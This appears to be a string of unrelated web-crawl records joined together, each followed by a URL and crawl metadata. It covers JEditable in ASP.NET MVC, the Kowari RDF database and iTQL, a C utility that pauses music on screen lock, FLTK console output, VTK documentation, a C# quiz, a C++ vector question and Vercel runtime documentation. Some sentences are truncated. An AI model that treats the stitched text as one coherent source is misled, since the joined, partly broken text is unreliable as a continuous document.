apply editable plugin on the cells. In the following figure, you can see how the Jeditable plugin can be applied on the table cells: In this example is applied the jQuery DataTables plug-in on the table, and then JEditable is applied to particular cells. Script that applies editable plugin on the table cells is simple: $("table#mycompanies td").editable("/Company/UpdateTableCell"); As long as each cell has its own id JEditable plugin will work. Better solution would be to avoid ids in each cell and send just id of the row and column with value. In that case you might take alook at the already prepared solution for applyng editable plugin on the DataTable on the DataTables site or DataTable Editable plugin that combines features of DataTables and JEditable plugins. You can see more details about creating an inline editable cell in the ASP.NET MVC Editable Table[^] article. In this article are shown basic concepts of implementation of an inline editor in MVC3. I have also shown various configuration options. If you have any questions about the Jeditable plug-in or you need more info about the way it is used, please take a look at the Jeditable site where you will find a complete documentation with live examples. Attached is source code with the Web Developer 2010 project where is implemented a simple page containing.
http://www.codeproject.com/Articles/265211/Using-JEditable-plugin-as-ASP-NET-MVC3-jQuery-inli?fid=1657030&df=90&mpp=25&sort=Position&spc=Relaxed&tid=4057693
CC-MAIN-2014-23
refinedweb
3,286
51.07
. Kowari is named for a small, mouselike Australian mammal, but given that the full version of the software is. Below, we'll use that console interface to create a database, populate it with an RDF file that describes United States senators, and query that data. A sample chunk of our RDF: <USSenator rdf: <Name>Lieberman, Joseph</Name> <Party>Democrat</Party> <State>CT</State> <URI></URI> </USSenator> First, we create a database on localhost (127.0.0.1) named "Senators". Kowari uses Java RMI URIs to identify databases. iTQL> create <rmi://127.0.0.1/server1#Senators>; Our next command will load senators.rdf into that just-created database. iTQL> load <> into <rmi://127.0.0.1/server1#Senators>; Kowari allows for aliases to be declared and used in a way akin to namespaces. iTQL> alias <> as ex; iTQL> alias <> as kowari; That first alias allows us to abbreviate the namespace of our senatorial RDF in all further queries. The second alias is a convenience abbreviation for the "is" equivalency operator built into Kowari, which we'll use below. Now that we're initiated, propagated, and aliased, we can query the triplestore. The query below selects all senators and their party afilliations. iTQL> select $subj $obj from <rmi://127.0.0.1/server1#Senators> where $subj <ex:Party> $obj; Here's what's happening: the "where" clause in the select statement defines constraints on the triplestore. In the example above, our "where" clause asks for all triples that have a predicate equal to ex:Party (which is an alias for). The output of the query above is a list of the 100 URIs making up the Senate, and their party affilliations: [, "Democrat" ] [, "Democrat" ] [, "Democrat" ] [, "Democrat" ] ... What if we only want to list Democrats? Using Kowari's built-in equivalency operator, <kowari:is> (aliased above), we can match string literal values. iTQL> select $subj $obj from <rmi://127.0.0.1/server1#Senators> where $subj <ex:Party> $obj and ($obj <kowari:is> 'Democrat'); Now we'll use more than one constraint in the where clause, and return more columns in our results. The query below names the different kinds of subjects and objects we expect, in order to allow us to list the name, web address (URI), and party affilliations for the senators from Connecticut (CT). iTQL> select $name $uri $party from <rmi://127.0.0.1/server1#Senators> where $senator <ex:Name> $name and $senator <ex:URI> $uri and $senator <ex:Party> $party and $senator <ex:State> $state and $state <kowari:is> 'CT'; order by $name; Our output: [ "Dodd, Christopher", "", "Democrat" ] [ "Lieberman, Joseph", "", "Democrat" ] And one final example: iTQL> create <rmi://127.0.0.1/server1#feeds> iTQL> load <> into <rmi://127.0.0.1/server1#feeds>; iTQL> select $uri $title from <rmi://127.0.0.1/server1#feeds> where $uri <> $title; The code above creates a database called "feeds", populates it with the most recent site summary XML from O'Reilly/XML.com; and, then, in response to a query, lists the URIs and titles of each article, that is, the bare bones of a queryable RSS aggregator in a few lines of iTQL. As shown above, iTQL's syntax looks quite a bit like SQL and is clearly intended to make transitioning to Kowari as simple as possible for DBAs. XML hackers used to the brevity of XPath might be less accepting, however. The iTQL console is one of several interfaces to the server. Access methods exist for JSP, SOAP, a JDBC driver, as well as for an iTQL JavaBean and Kowari's own low-level driver interface Three other features worth noting are Lucene full-text integration, descriptors, and named graphs. Lucene full-text integration. RDF is not simply triples made up of URIs; in practice, much RDF (as in the examples above) contains string literal or XML data. Kowari can use the open-sourced Lucene search engine to index this text. To use Lucene indexing, the DBA creates a separate database using the Lucene "model". Queries can then be constrained by the results returned from a Lucene search. In practice, this allows for searches that keep track of the source of a given token within a graph. In simple English, Lucene integration allows queries like: "select all articles where the title includes the words 'hacking' and 'library'," or "show me the publication dates of all books that contain the word 'Texas'." Lucene allows for basic keyword lookups as well as complex queries, including fuzzy matching and wildcards, and its presence in the database provides Kowari users with an appealing combination of Semantic Web-style, graph-based querying with old-school text lookups. Descriptors. Descriptors bind iTQL commands to XSLT variables. Using descriptors, a developer can create an XSLT template and then populate it, dynamically, with values fetched from an iTQL query. This feature will be of particular interest to web developers who want to create custom, navigable web interfaces above large RDF stores, along with anyone who wants to convert RDF data into legacy XML formats. (Descriptors are not included in Kowari Lite.) Named graphs. One problem that frequently comes up in the RDF community is the "provenance" problem -- how do we know, in a large triplestore, where a given triple comes from? Many have suggested named graphs as a solution, which will turn triples into "quads". Kowari has taken this path. According to Tom Adams, "Our triplestore is really a quad store, the 4th tuple being the group/model that a triple belongs to." Kowari is written in Java 1.4.2 and uses that version's New I/O (NIO). This provides for an decrease in access times, as Kowari is able to bypass the need for a storage layer (such as BerkeleyDB or MySQL), and write data blocks directly to disk. Tucana has tested the 32-bit version of Kowari with 10 million statements, and the 64-bit with 50 million; TKS has been scaled up to 250 million statements and can conceivably manage a billion triples. Currently the software is used by a variety of clients, with applications in genomics research defense integration, and automobile manufacturing, and the firm reports dramatically increased performance on graph queries over relational databases. While Kowari is capable of doing real work today, Tucana plans to continue adding features to both make the triplestore more standards compliant. Inferencing support via OWL support is planned, and Tucana hopes to eventually support OWL DL, with stops at RDFS and "OWL Tiny" along the way. Support for arbitrary data types is also planned. Tucana is also developing a new approach to file addressing, which they call a "resolver". Resolvers allow any resource to be assigned a special "file://" URI, and allow for the processing of arbitrary files as "pseudo-RDF". For instance, a resolver that points to an MP3 file can automatically extract and store a description of the file based on the ID3 tags embedded in the MP3; the same could be done with JPEG files containing metadata. This approach seems particularly interesting because it provides a simple way to absorb the "ambient data" on a computer -- unstructured content like photo and MP3 directories -- into a database, where it can be searched and explored. Kowari is a solid tool created by an enthusiastic, knowledgeable team. That said, it. But DBAs looking to replicate the user/privileges model of MySQL or other databases may be disappointed by Kowari. These minor issues aside, Kowari works as promised. SQL users should find it easy to migrate their skills to iTQL. Most commendably, in the open source tradition, the database has been designed to "play nice with others," allowing anyone who has invested their energies in building, for instance, a Jena solution to migrate to Kowari with minimum pain. Kowari should be a welcome addition to any Semantic Web developer's toolbox. © , O’Reilly Media, Inc. (707) 827-7019 (800) 889-8969 All trademarks and registered trademarks appearing on oreilly.com are the property of their respective owners.
http://www.xml.com/pub/a/2004/06/23/kowari.html
CC-MAIN-2015-18
refinedweb
1,334
62.38
If you’ve got music playing on your PC and then you lock the desktop, the music keeps playing. Sometimes this is what you want, and sometimes it’s not… I was dogfooding the recent release of a certain media playing software not so long ago, which meant I had stuff playing more of the time than typical. One annoyance that kept bugging me was that I had to remember to pause the music player before locking (Win+L) the desktop, so as not to annoy while I was away from my desk (and to not miss the rest of an album). As far as I can tell, most music players keep on playing under a lock screen, which is the right thing in many cases, but not here… This was an itch I needed to scratch and, just for fun, I thought I’d write it in C (not even C++) to get away from all this new fangled object-oriented language stuff I’ve been doing recently. (Yes, I know, you can write OO in C, but you know what I mean). Just to make it more interesting, I decided not to use any of the standard C runtime libraries, and top make this application as small as I could without having to resort to assembler. Of course, all this meant that an hour’s work took probably a day from start to finish! Given all that, there are two sections in this blog post: first, the one that actually addresses the problem I set out to address, namely getting the music player to stop playing; the second shorter part covers the tricks to make the application binary and running footprint small. To begin, we need to detect when a workstation is being locked (and unlocked, of course): WTRegisterSessionNotification is the function to look at. After you call this, the window you designate will be sent messages when login sessions on the PC change state: we’re interested in the lock and unlock notifications. The next part is to control the music player: I’ve been deliberately vague about which player I’m interested in (well, apart from that obvious link above), and that’s because the technique I used works with most players. Windows supports a WM_APPCOMMAND message type which, as the name suggests, is used to ferry “application level” messages to and from various applications, such as copy, paste, change volume and, as desired here, pause and play. (Incidentally, these types of message are what the additional keys on “multimedia” keyboards use to perform their functions.) Most modern media players recognise the app command messages for media control and respond appropriately, so all I’ve got to do is send those messages to the media player. How do I determine which window to send the messages to? A clever search based on window title or class? Nope, I just broadcast to all top level windows that happen to be running… Here’s my window procedure: LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { switch (msg) { case WM_CREATE: WTSRegisterSessionNotification(hwnd, NOTIFY_FOR_THIS_SESSION); /* Make it go very quiet... */ SetProcessWorkingSetSize( GetCurrentProcess(), (SIZE_T)-1, (SIZE_T)-1 ); break; case WM_DESTROY: WTSUnRegisterSessionNotification(hwnd); break; case WM_WTSSESSION_CHANGE: if (wParam == WTS_SESSION_LOCK || wParam == WTS_SESSION_UNLOCK) { int start = wParam == WTS_SESSION_UNLOCK; PostMessage(HWND_BROADCAST, WM_APPCOMMAND, 0, MAKELONG(0, start ? APPCOMMAND_MEDIA_PLAY : APPCOMMAND_MEDIA_PAUSE)); if(!start) PostMessage(HWND_TOPMOST, WM_SYSCOMMAND, SC_MONITORPOWER, 2); } break; } return DefWindowProc(hwnd, msg, wParam, lParam); } I register for session notifications in the WM_CREATE handler. I also reduce the working set (roughly speaking, working memory) at that point too, to let the system release any memory I might have used for initialisation (and that I won’t need to use again) – I suspect that really doesn’t make much difference these days, and I’ve been too lazy to actually measure its impact in any case. For tidiness, I unregister in the destroy handler – probably not necessary since the process is exiting at that point anyway, but I might as well be tidy! You can see in the WM_WTSESSION_CHANGE handler how I create the correct media control message and then broadcast it system wide. (Note that my flag is an int here, not a bool – remember, I said I was writing C, not C++.) In that handler too, when I detect a session lock, I send an additional message, a shut down monitor sys command message: this turns the monitor off, saving a little power. After all, if I’m locking the workstation, it’s probably because I’m wandering off, or at least not looking at the screen. I’m not going to bother to describe how to create the window for which this is the window procedure: that sort of thing is covered in many places, such as the venerable Windows programming books by Charles Petzold (I cut my Windows teeth on the 3.1 version of that book – how old does that make me feel?) – if someone really really does want the whole story, ask in the comments… Rather than have the window cluttering up the desktop, I never actually show it (after all, this application needs no UI to work), but I do create a notification area icon to remind me that it’s running, and to also give me a means of exiting the program without resorting to Task manager. Again, that’s covered in lots of places so I won’t describe it here: just do a search for Shell_NotifyIcon. One thing, however, that is very important and that few people who use notification area icons seem to neglect, is re-registering the icon when Windows Explorer restarts. Explorer doesn’t crash often (and, when it does, it’s mainly my fault because I’ve screwed up some Explorer add-in that I’m working on) but it is annoying to lose some notification area icons after a restart. What one should do is handle the taskbar created message: this doesn’t have a WM_ constant definition, but instead the message number must be retrieved via RegisterWindowMessage, as in: UINT WM_TASKBAR_CREATED; ... WM_TASKBAR_CREATED = RegisterWindowMessage(_T("TaskbarCreated")); Then, in the windows procedure, add a default case to check for this message: default: if (msg == WM_TASKBAR_CREATED) /* Do whatever you need to register the icon again */; break; (Because the message isn’t a constant, you can’t have a case specifically for it, so this is the best one can do.) Now, on to the second part, making the application small. By default, Visual Studio C(++) projects link with the standard libraries (sometimes known as the CRT). Since I’m not using anything at all from them, I can ignore them. If you look at the CRT source for how the WinMain function you define is called, you’ll see that there’s a “main” (actually several of them) within the CRT which set up heaps, debug support and a bunch of other things before calling WinMain. None of that is necessary here, apart from calling ExitProcess when my application wants to exit. (Heck, that might not even be necessary but, as with unregistering the session messages, it’s probably good to be tidy.) I’ve replaced all of that with: void __cdecl Startup(void) { ExitProcess(Main(GetModuleHandle(NULL))); } where Main is my stripped down WinMain which takes only the program HINSTANCE – I don’t care about any of the other parameters WinMain normally gets. My Main looks like: UINT Main(HINSTANCE hInstance) { MSG msg; HWND hwnd = Initialise(hInstance); /* Create my window and notification icon here */ if(!hwnd) return 0; /* Standard message loop */ while (GetMessage(&msg, NULL, 0, 0)) { TranslateMessage(&msg); DispatchMessage(&msg); } /* ... delete notification area icon here ... */ return (UINT)msg.wParam; /* Doesn't really achieve anything, but is the conventional return protocol */ } Next, you need to change the linker settings to invoke Startup instead of the default CRT initialisation call. After all of that, the binary is all of 9.5KB, about half of which is the notification area icon and version information, which is about as small as you can go these days, and a lot smaller than a typical “hello world” program which does link to the CRT. Completely pointless in these days of multi-GB RAM and TB disks, but it was fun. Join the conversationAdd Comment
https://blogs.msdn.microsoft.com/gsmyth/2011/10/02/shaddapayaface/
CC-MAIN-2017-09
refinedweb
1,375
52.83
A SAX Parser Based on JavaScript's String.replace() Method?. A native SAX implementation in JavaScript would for example let you grab data from RSS feeds over Ajax without loading the entire RSS document into a DOM tree. Or, assuming your XHTML was well-formed, it would let you rapidly query the current document. (Although it wouldn't be able to return references to existing DOM nodes.). (YMMV depending on what browser you use.) Try it out on this simple XML fragment: The SAX function looks like this: doSax(stringToParse,doStartTag,doEndTag,doAttribute,doText); The callback functions for this example are: function doStartTag(name){alert("opening tag: "+name);} function doEndTag(name){alert("closing tag: "+name);} function doAttribute(name,val){alert("attribute: "+name+'="'+val+'"');} function doText(str){ str=str.normalize(); if(!str){str='[whitespace]';} alert("encountered text node: "+str); } And here's the code: sax.js. I think that with a little work (i.e. the ability to handle namespaces, comments, and other declarations) this could potentially be usable--maybe not as a full-fledged SAX parser--but a quick and dirty utility for reading XML via Ajax. Hmm, a tag soup SAX-style parser might be nice to have too. Nice job! Posted by Jose on April 07, 2008 at 06:55 AM MDT #
http://blogs.sun.com/greimer/entry/a_sax_parser_built_on
crawl-002
refinedweb
214
63.39
Introduction and Goal's from my site . public class Service1 : IService1 { public string GetData(int value) { return string.Format("You entered: {0}", value); } public CompositeType GetDataUsingDataContract(CompositeType composite) { if (composite.BoolValue) { composite.StringValue += "Suffix"; } return composite; } } 'bindingConfiguration' tag to specify the binding name. We also need to specify the address where the service is hosted. Please note the HTTS in the address tag.Change 'mexHttpBinding' to 'mex 'serviceMetadata' we also need to change 'httpGetEnabled' to 'https 'make 'Assign a existing certificate' from the wizard. You can see a list of certificates. The "compaq-jzp37md0" certificate is the one which we just created using 'makecert.exe'. Now try to test the site without 'https' and you will get an error as shown below….That means your certificate is working. Do not forget to enable IIS anonymous access.; } } } ©2014 C# Corner. All contents are copyright of their authors.
http://www.c-sharpcorner.com/UploadFile/shivprasadk/7-simple-steps-to-enable-https-on-wcf-wshttp-bindings/
CC-MAIN-2014-35
refinedweb
148
53.27
[ Return to Articles | Show Comments | Submit Comment ] Created at 14:57 Sep 19, 2017 by greg.ercolano Last modified at 14:59 Sep 19, 2017 If you have an FLTK Windows GUI application (built with /subsystem:windows), you can create a DOS style window and redirect stdout/stderr to it at runtime. This shows a pretty simple way to do this using AllocConsole() and AttachConsole() which can give a Windows application (that backrgrounds itself) a way to display stdout/stderr. #define _WIN32_WINNT 0x0501 // needed for AttachConsole #include <windows.h> // AllocConsole() #include <Wincon.h> // AttachConsole() #include <stdio.h> #include <stdlib.h> #include <FL/Fl.H> #include <FL/Fl_Window.H> int main() { // Open a DOS style console, redirect stdout to it AllocConsole() ; AttachConsole(GetCurrentProcessId()) ; freopen("CON", "w", stdout) ; freopen("CON", "w", stderr) ; printf("Hello world on stdout!\n"); printf("Hello world on stderr!\n"); Fl_Window win(400,400); win.show(); return Fl::run(); } ..and yes, you /could/ also compile your app with /SUBSYSTEM:CONSOLE to get similar results: this lets you see stdout/stderr in the DOS window you invoked the program from, or if you clicked on the app to run it, that first opens a separate DOS window then runs your app inside it. However, in THIS example shown here, it shows a way to /conditionally/ open a DOS style window for redirecting stdout/err in a /SUBSYSTEM:WINDOWS app, where the application runs in the background when invoked from a DOS terminal, which can be useful too. For instance, you could make the DOS style window only appear when needed, such as to display some debug info, then you can later make it go away with FreeConsole(). [ Reply ]
http://www.fltk.org/articles.php?L1549
CC-MAIN-2017-43
refinedweb
279
55.64
Design Guidelines, Managed code and the .NET Framework Clearly this code should fail a code review but what would calling PrintValue() display? public class Foo { public static int Value = 42; static Foo() { Value = 17; } public static void PrintValue () Console.WriteLine(Value); } Same, question, but in VB: Class Foo Public Shared Value As Integer = 42 Shared Sub New() Value = 17 End Sub Public Shared Sub PrintValue() Console.WriteLine(Value) End Class Even more importantly, assuming we want Value to be initialized to 63, what is the best code and why? Setting the static field in line: public static int Value = 63; public static void PrintValue () Or using a type constructor: public static int Value; Value = 63;
http://blogs.msdn.com/brada/archive/2004/08/15/214948.aspx
crawl-002
refinedweb
115
61.16
#include<iostream> #include <iomanip> #include<vector> #include "d_util.h" using namespace std; template <typename T> void writeVector(const vector<T>& v); int main() { vector<int>v; for (int n=0; n<=9; n++) { printf("A number between 0 and 9: %d\n", rand()%9);; v.push_back(n); n = v.size(); for(int i = 0; i < n; i++) cout << v[i] << " "; cout << endl; } writeVector(v); return 0; } This program runs and executes perfectly, however i need v.push_back to push back the random numbers and the writeVector to write the random numbers. can anybody point in that direction. This post has been edited by Videege: 26 October 2006 - 09:54 AM
http://www.dreamincode.net/forums/topic/20124-writing-vectors/
CC-MAIN-2016-44
refinedweb
110
66.84
Official Runtimes Runtimes are modules that transform your source code into Serverless Functions, which are served by our CDN at the edge. Listed below are all official Runtimes from Vercel. Node.jsStatus: Stable The Node.js Runtime, by default, builds and serves Serverless Functions within the /api directory of a project, providing the files have a file extension of either .js or .ts. A Node.js Serverless Function must export a default function handler, for example: module.exports = (req, res) => { const { name = 'World' } = req.query; res.send(`Hello ${name}!`); }; An example serverless Node.js function using the Request and Response objects. If you need more advanced behavior, such as a custom build step or private npm modules, see the Advanced Node.js Usage section. Node.js Version Whenever a new Project is created, the latest Node.js LTS version available on Vercel at that time is selected for it. This selection will be reflected within the Node.js Version section on the General page of the Project Settings. If needed, you can also customize it there: Selecting a custom Node.js version for your Project. Currently, the following Node.js versions are available: - 14.x (default since February 4th 2021) - 12.x - 10.x (disabled since April 20th 2021) As you can see, only major versions are available. That's because Vercel will automatically roll out minor and patch updates if needed (for example in the case that a security issue needs to be fixed). Defining the node property inside engines of a package.json file will override the selection made in the Project Settings and print a Build Step warning if the version does not match. In order to find out which Node.js version your Deployment is using, run node -v in the Build Command or log the output of process.version. Node.js Dependencies For dependencies listed in a package.json file at the root of a project, the following behavior is used: - If a package-lock.jsonfile is present in the project, npm installis used. - Otherwise, yarnis used, by default. Using TypeScript with the Node.js Runtime: import { VercelRequest, VercelResponse } from '@vercel/node'; export default function (req: VercelRequest, res: VercelResponse) { const { name = 'World' } = req.query; res.send(`Hello ${name}!`); } An example serverless Node.js function written in TypeScript, using types from the @vercel/node module for the helper methods. The VercelRequest and VercelResponse imports in the above example are types that we provide for the Request and Response objects, including the helper methods with Vercel. These types can be installed from npm with the following command: npm install @vercel/node --save-dev Installing @vercel/node for types when using Node.js on Vercel. You can also use a tsconfig.json file at the root of your project to configure the TypeScript compiler. Most options are supported aside from "Path Mappings" and "Project References". Node.js Request and Response Objects Each request to a Node.js Serverless Function gives access to Request and Response objects. These objects are the standard HTTP Request and Response objects from Node.js. Node.js Helpers Vercel additionally provides helper methods inside of the Request and Response objects passed to Node.js Serverless Functions. These methods are: The following Node.js Serverless Function Serverless Function using the req.query, req.cookies, and req.body helpers. It returns greetings for the user specified using req.send(). helpersusing advanced configuration. Request Body We populate the req.body property with a parsed version of the content sent with the request when possible. We follow a set of rules on the Content-type header sent by the request to do so: With the req.body helper, you can build applications without extra dependencies or having to parse the content of the request manually. req.bodyhelper is set using a JavaScript getter. In turn, it is only computed when it is accessed. When the request body contains malformed JSON, accessing req.body will throw an error. You can catch that error by wrapping req.body with try...catch: try { req.body; } catch (error) { return res.status(400).json({ error: 'My custom 400 error' }); } Catching the error thrown by req.body with try...catch. GoStatus: Alpha The Go Runtime is used by Vercel to compile Go Serverless Functions that expose a single HTTP handler, from a .go file within an /api directory at your project's root. For example, define an index.go file inside an /api directory as follows: package handler import ( "fmt" "net/http" ) func Handler(w http.ResponseWriter, r *http.Request) { fmt.Fprintf(w, "<h1>Hello from Go!</h1>") } An example index.go file inside an /api directory. For advanced usage, such as using private packages with your Go projects, see the Advanced Go Usage section. HandlerFuncsignature type, but can use any valid Go exported function declaration as the function name. Go Version The Go Runtime will automatically detect the go.mod file at the root of your Project to determine the version of Go to use. If go.mod is missing or the version is not defined, the default version 1.16 will be used. Go Dependencies The Go Runtime will automatically detect the go.mod file at the root of your Project to install dependencies. Go Build Configuration You can provide custom build flags by using the GO_BUILD_FLAGS Environment Variable. { "build": { "env": { "GO_BUILD_FLAGS": "-ldflags '-s -w'" } } } An example -ldflags flag with -s -w. This will remove debug information from the output file. This is the default value when no GO_BUILD_FLAGS are provided. PythonStatus: Beta The Python Runtime is used by Vercel to compile Python Serverless Functions, that defines a singular HTTP handler variable, inheritting from the BaseHTTPRequestHandler class, from a .py file within an /api directory at your project's root. For example, define an index.py file inside a /api directory as follows: from http.server import BaseHTTPRequestHandler from cowpy import cow class handler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-type','text/plain') self.end_headers() message = cow.Cowacter().milk('Hello from Python from a Serverless Function!') self.wfile.write(message.encode()) return An example index.py file inside an /api directory. Inside requirements.txt define: cowpy==1.0.3 An example requirements.txt file that defines cowpy as a dependency. For advanced usage, such as using WSGI or ASGI for your Python projects, see the Advanced Python Usage section. Python Version Python projects deployed with Vercel use Python version 3.6. Python Dependencies You can install dependencies for your Python projects by defining them in a requirements.txt or a Pipfile.lock file. RubyStatus: Alpha The Ruby Runtime is used by Vercel to compile Ruby Serverless Functions that define a singular HTTP handler from .rb files within an /api directory at your project's root. Ruby files must have one of the following variables defined: Handlerproc that matches the do |req, res|signature. Handlerclass that inherits from the WEBrick::HTTPServlet::AbstractServletclass. For example, define a index.rb file inside a /api directory as follows: require 'cowsay' Handler = Proc.new do |req, res| name = req.query['name'] || 'World' res.status = 200 res['Content-Type'] = 'text/text; charset=utf-8' res.body = Cowsay.say("Hello #{name}", 'cow') end An example index.rb file inside an /api directory. Inside a Gemfile define: source "" gem "cowsay", "~> 0.3.0" An example Gemfile file that defines cowsay as a dependency. Ruby Version New deployments use Ruby 2.7.x as the default version. You can specify the version of Ruby by defining ruby in a Gemfile, like so: source "" ruby "~> 2.7.x" When defining a Ruby version, the following Ruby versions can be selected: - 2.7.x (default) - 2.5.x 2.5.5it will be ignored and assume the latest 2.5.x. Ruby Dependencies This Runtime supports installing dependencies defined in the Gemfile. Alternatively, dependencies can be vendored with the bundler install --deployment command (useful for gems that require native extensions). In this case, dependencies are not built on deployment. Advanced Usage By default, no configuration is needed to deploy Serverless Functions to Vercel. For all officially supported languages (see below), the only requirement is creating a api directory and placing your Serverless Functions inside. In order to customize the Memory or Maximum Execution Duration of your Serverless Functions, you can use the functions property. Community Runtimes If you would like to use a language that Vercel does not support by default, you can use a Community Runtime by setting the functions property in vercel.json: { "functions": { "api/test.php": { "runtime": "vercel-php@0.1.0" } } } The following Community Runtimes are recommended by Vercel: Advanced Node.js Usage In order to use this Runtime, no configuration is needed. You only need to create a file inside the api directory. The entry point for src must be a glob matching .js or .ts files that export a default function. For more information on using this Runtime, see the Node.js Runtime section. Disabling Helpers for Node.js Add an Environment Variable with name NODEJS_HELPERS and value 0 to disable helpers. Private npm Modules for Node.js To install private npm modules, define NPM_TOKEN as an Environment Variable in your Project. Alternatively, define NPM_RC as an Environment Variable with the contents of ~/.npmrc. Custom Build Step for Node.js In some cases, you may wish to include build outputs inside your Serverless Function. You can run a build task by adding a vercel-build script within your package.json file, in the same directory as your Serverless Function or any parent directory. The package.json nearest to the Serverless Function will be preferred and used for both Installing and Building. For example: { "scripts": { "vercel-build": "node ./build.js" } } An example package.json file with a vercel-build script to execute in the build step. Along with build script named build.js: const fs = require('fs'); fs.writeFile('built-time.js', `module.exports = '${new Date()}'`, (err) => { if (err) throw err; console.log('Build time file created successfully!'); }); An example Node.js file, executed by the above package.json build script. And a .js file for the built Serverless Functions, index.js inside the /api directory: const BuiltTime = require('./built-time'); module.exports = (req, res) => { res.setHeader('content-type', 'text/plain'); res.send(` This Serverless Function was built at ${new Date(BuiltTime)}. The current time is ${new Date()} `); }; An example Node.js Serverless Function, using information from the created file from the build script. Legacy Serverful Behavior A Node.js Runtime entrypoint can contain one of the following to retain legacy serverful behavior: - Default export server, such as module.exports = http.createServer((req, res) => { res.end('hello') }). - Server listens on a port, such as http.createServer((req, res) => { res.end('hello') }).listen(3000). AWS Lambda API The Node.js Runtime provides a way to opt into the AWS Lambda API. This is useful if you have existing Serverless Functions you wish to deploy to Vercel but do not want to change the API. exports.handler = async function (event, context, callback) { return { statusCode: 200, headers: {}, body: 'Hello world', }; }; { "build": { "env": { "NODEJS_AWS_HANDLER_NAME": "handler" } } } The value of the environment variable needs to match the name of the method that is exported from your Serverless Functions. Advanced Go Usage In order to use this Runtime, no configuration is needed. You only need to create a file inside the api directory. The entry point of this Runtime is a global matching .go files that export a function that implements the http.HandlerFunc signature. For more information on using this Runtime, see the Go Runtime section. Private Packages for Go To install private packages with go get, add an Environment Variable named GIT_CREDENTIALS. The value should be the URL to the Git repo including credentials, such as. All major Git providers are supported including GitHub, GitLab, Bitbucket, as well as a self-hosted Git server. With GitHub, you will need to create a personal token with permission to access your private repository. Advanced Python Usage In order to use this Runtime, no configuration is needed. You only need to create a file inside the api directory. The entry point of this Runtime is a glob matching .py source files with one of the following variables defined: handlerthat inherits from the BaseHTTPRequestHandlerclass. appthat exposes a WSGI or ASGI Application. Reading Relative Files in Python Python uses the current working directory when a relative file is passed to open(). The current working directory is the base of your project, not the api/ directory. For example, the following directory structure: ├── README.md ├── api | ├── user.py ├── data | └── file.txt └── requirements.txt With the above directory structure, your function in api/user.py can read the contents of data/file.txt in a couple different ways. You can use the path relative to the project's base directory. # api/user.py from http.server import BaseHTTPRequestHandler from os.path import join class handler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-type','text/plain') self.end_headers() with open(join('data', 'file.txt'), 'r') as file: for line in file: self.wfile.write(line.encode()) return Or you can use the path relative to the current file's directory. # api/user.py from http.server import BaseHTTPRequestHandler from os.path import dirname, abspath, join dir = dirname(abspath(__file__)) class handler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-type','text/plain') self.end_headers() with open(join(dir, '..', 'data', 'file.txt'), 'r') as file: for line in file: self.wfile.write(line.encode()) return, when using vercel.json config. For example, define a index.py file inside your project as follows: from flask import Flask, Response app = Flask(__name__) @app.route('/', defaults={'path': ''}) @app.route('/<path:path>') def catch_all(path): return Response("<h1>Flask</h1><p>You visited: /%s</p>" % (path), mimetype="text/html") An example index.py file, using Flask for a WSGI application. Inside requirements.txt define: flask==1.0.2 An example requirements.txt file, listing flask as a dependency. Asynchronous Server Gateway Interface The Asynchronous Server Gateway Interface (ASGI) is a calling convention for web servers to forward requests to asynchronous web applications written in Python. You can use ASGI with frameworks such as Sanic. Instead of defining a handler, define an app variable in your Python file. For example, define a index.py file inside a folder as follows: from sanic import Sanic from sanic.response import json app = Sanic() @app.route('/') @app.route('/<path:path>') async def index(request, path=""): return json({'hello': path}) An example index.py file, using Sanic for a ASGI application. Inside requirements.txt define: sanic==19.6.0 An example requirements.txt file, listing sanic as a dependency. Developing Your Own Runtime Extending the feature-set of a Vercel deployment is as simple as creating a Runtime that takes a list of files and outputs either static files or dynamic Serverless Functions. A full API reference is available to help with creating Runtimes. Technical Details Caching Data A runtime can retain an archive of up to 100mb of the filesystem at build time. The cache key is generated as a combination of: - Project name. - Team id or user id. - Entrypoint path (e.g., api/users/index.go). - Runtime identifier including version (e.g.: @vercel/go@0.0.1). The cache will be invalidated if any of those items changes. The user can bypass the cache by running vercel -f. Limits - Runtimes can run for a maximum of 5 minutes before the execution times out. - The maximum cache archive size of a Runtime is 100mb. - The cache TTL is 7 days. Including Additional Files Most Runtimes use static analysis to determine which source files should be included in the Serverless Function output based on the build src input. Any unused code or assets is ignored to ensure your Serverless Function is as small as possible. For example, the Node Runtime looks at calls to require() or fs.readFile() in order to determine which files to include automatically. // index.js const { readFileSync } = require('fs'); const { join } = require('path'); const file = readFileSync(join(__dirname, 'config', 'ci.yml'), 'utf8'); This /index.js file reads the contents of /config/ci.yml. The use of __dirname is necessary to read a file relative to the current file. In some cases, you may wish to include templates or views that are not able to be statically analyzed. Runtimes provide a configuration for includeFiles that accepts a glob of files that will always be included in the Serverless Functions output. { "functions": { "api/test.js": { "includeFiles": "templates/**" } } } Using the default Node.js language and configuring the includeFiles within a vercel.json configuration file.
https://vercel.com/docs/runtimes?query=runtime
CC-MAIN-2021-31
refinedweb
2,772
52.97
class used to assign Id to any VTK object and be able to retrieve it base on its id. More... #include <vtkObjectIdMap.h> class used to assign Id to any VTK object and be able to retrieve it base on its id. Definition at line 30 of file vtkObjectIdMap.h. Definition at line 34 of file vtkObjectIdMap.h. Return 1 if this class is the same type of (or a subclass of) the named class. Returns 0 otherwise. This method works in combination with vtkTypeMacro found in vtkSetGet.h. Reimplemented from vtkObjectBase. Retrieve a unique identifier for the given object or generate a new one if its global id was never requested. Retrieve a previously stored object based on a name. Remove any internal reference count due to internal Id/Object mapping.
https://vtk.org/doc/nightly/html/classvtkObjectIdMap.html
CC-MAIN-2019-47
refinedweb
132
68.26
